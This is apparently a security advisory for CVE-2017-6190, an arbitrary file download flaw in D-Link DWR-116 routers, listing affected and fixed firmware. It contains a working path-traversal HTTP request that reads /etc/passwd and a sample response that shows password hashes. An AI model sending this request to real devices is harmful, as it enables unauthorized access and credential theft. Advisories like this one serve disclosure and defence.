D-Link DWR-116 CVE-2017-6190 Arbitrary File Download Vulnerabilitiy



D-Link DWR-116 is prone to an arbitrary-file-download vulnerability.

An attacker can exploit this issue to download arbitrary files from the device filesystem and obtain potentially sensitive information.

Information

Bugtraq ID: 97620
Class: Input Validation Error
CVE: CVE-2017-6190

Remote: Yes
Local: No
Published: Apr 07 2017 12:00AM
Updated: Apr 07 2017 12:00AM
Credit: Patryk Bogdan
Vulnerable: D-Link DWR-116 1.05(AU)
D-Link DWR-116 1.01(EU)
D-Link DWR-116 1.00(CP)b10


Not Vulnerable: D-Link DWR-116 1.05b09


Exploit


Attackers can use a browser to exploit these issues.
The following example request is available:
HTTP Request:
GET /uir/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: www.example.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
HTTP Response:
HTTP/1.0 200 OK
Content-Type: application/x-none
Cache-Control: max-age=60
Connection: close
root:$1$$taUxCLWfe3rCh2ylnFWJ41:0:0:root:/root:/bin/ash
nobody:$1$$qRPK7m23GJusamGpoGLby/:99:99:nobody:/var/usb:/sbin/nologin
ftp:$1$$qRPK7m23GJusamGpoGLby/:14:50:FTP USER:/var/usb:/sbin/nologin


Related Posts